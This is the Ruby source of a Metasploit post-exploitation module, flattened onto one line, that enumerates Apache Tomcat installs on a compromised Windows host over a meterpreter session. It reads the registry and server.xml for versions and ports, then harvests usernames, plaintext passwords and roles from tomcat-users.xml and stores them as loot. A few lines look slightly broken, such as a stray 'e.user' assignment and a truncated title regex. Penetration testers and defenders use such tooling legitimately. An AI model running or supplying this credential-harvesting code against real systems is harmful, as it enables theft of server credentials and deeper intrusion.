## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'rex' require 'rexml/document' require 'msf/core' require 'msf/core/auxiliary/report' class Metasploit3 < Msf::Post include Msf::Post::File include Msf::Post::Windows::Registry include Msf::Auxiliary::Report def initialize(info={}) super( update_info( info, 'Name' => 'Windows Gather Apache Tomcat Enumeration', 'Description' => %q{ This module will collect information from a Windows-based Apache Tomcat. You will get information such as: The installation path, Tomcat version, port, web applications, users, passwords, roles, etc. }, 'License' => MSF_LICENSE, 'Author' => [ 'Barry Shteiman ', # Module author ], 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ] )) end # method called when command run is issued def run installs = [] results = [] users = [] print_status("Enumerating Tomcat Servers on #{sysinfo['Computer']}") if check_tomcat installs += identify_registry if not installs.empty? installs.each do |inst| results += enumerate_tomcat(inst[0],inst[1]) users += enumerate_tomcat_creds(inst[0]) end else print_status("Done, Tomcat Not Found") return end end if results.empty? print_status("Done, Tomcat Not Found") return end print_status("Done, Tomcat Found.") tbl_services = Rex::Ui::Text::Table.new( 'Header' => "Tomcat Applications ", 'Indent' => 1, 'Columns' => [ "Host", "Tomcat Version", "Port", "Web Application" ]) results.each { |r| report_service(:host => session.sock.peerhost, :port => r[2], :name => "http", :info => "#{r[0]} Tomcat #{r[1]}, Application:#{r[3]}") tbl_services << r } tbl_users = Rex::Ui::Text::Table.new( 'Header' => "Tomcat Server Users ", 'Indent' => 1, 'Columns' => [ "Host", "User", "Password", "Roles" ]) users.each { |u| tbl_users << [ session.sock.peerhost,u[0],u[1],u[2] ] } print_line() print_line(tbl_services.to_s) print_line(tbl_users.to_s) p = store_loot("host.webservers.tomcat", "text/plain", session, tbl_services.to_s + "\n" + tbl_users.to_s, "tomcat.txt", "Tomcat Server Enum") print_status("Results stored in: #{p}") end ### initial identification methods ### # method for checking if webserver is installed on server - tomcat def check_tomcat key = "HKLM\\SOFTWARE\\Apache Software Foundation" if registry_enumkeys(key).include?("Tomcat") print_status("\tTomcat found.") return true end return false rescue return false end ### deep server enumeration methods ### # enumerate tomcat def enumerate_tomcat(val_installpath,val_version) results = [] found = false print_good("\t\t+ Version: #{val_version}") print_good("\t\t+ Path: #{val_installpath}") if not exist?(val_installpath + "\\conf\\server.xml") print_error("\t\t! tomcat configuration not found") return results end appname = find_application_name(val_installpath) ports = [] xml_data = read_file(val_installpath + "\\conf\\server.xml") doc = REXML::Document.new(xml_data) doc.elements.each('Server/Service/Connector') do |e| ports << e.attributes['port'] end ports.uniq.each do |p| print_good("\t\t+ Port: #{p}") found = true results << [session.sock.peerhost,"#{val_version}",p,appname] end if found print_good("\t\t+ Application: [#{appname}]") else print_error("\t\t! port not found") end return results rescue print_error("\t\t! could not identify information") return results || [] end # enumerate tomcat users from its user base def enumerate_tomcat_creds(val_installpath) users = [] userpath = val_installpath + "\\conf\\tomcat-users.xml" if exist?(userpath) xml_data = read_file(userpath) doc = REXML::Document.new(xml_data) if not doc.elements.empty? doc.elements.each('tomcat-users/user') do |e| e_user=e.attributes['name'] if e_user.length >0 e_user=e.attributes['name'] else e.user=e_user=e.attributes['username'] end users << [ e_user,e.attributes['password'],e.attributes['roles'] ] print_good("\t\t+ User:[#{e_user}] Pass:[#{e.attributes['password']}] Roles:[#{e.attributes['roles']}]") end else print_error("\t\t! No Users Found") return users end end return users rescue print_error("\t\t! could not identify users") return users || [] end ### helper functions ### #this method identifies the correct registry path to tomcat details, and returns [path,version] def identify_registry values = [] basekey = "HKLM\\SOFTWARE\\Apache Software Foundation\\Tomcat" instances = registry_enumkeys(basekey) if not instances.nil? and not instances.empty? instances.each do |i| major_version_key = "#{basekey}\\#{i}" services = registry_enumkeys(major_version_key) if services.empty? val_installpath = registry_getvaldata(major_version_key,"InstallPath") val_version = registry_getvaldata(major_version_key,"Version") values << [val_installpath,val_version] else services.each do |s| service_key = "#{major_version_key}\\#{s}" val_installpath = registry_getvaldata(service_key,"InstallPath") val_version = registry_getvaldata(service_key,"Version") values << [val_installpath,val_version] end end end end return values rescue print_error("\t\t! failed to locate install path") return nil || [] end #this function extracts the application name from the main page of the web application def find_application_name(val_installpath) index_file = ['index.html','index.htm','index.php','index.jsp','index.asp'] path = val_installpath + "\\webapps" if not directory?(path + "\\ROOT") print_error("\t\t! expected directory wasnt found") return "Unknown" end index_file.each do |i| if not exist?("#{path}\\ROOT\\#{i}") next end data = read_file(path + "\\ROOT\\#{i}") if data =~ /(?i)([^<]+)<\/title>/ return $1 else #look for redirect as name if data =~ /(?i)onload=\"?document\.location\=['"]?([\/\w\d]+)['"]?\"?/ return $1.gsub("/","") end end end return "Unknown" rescue print_error("\t\t! could not identify application name") return "Unknown" end end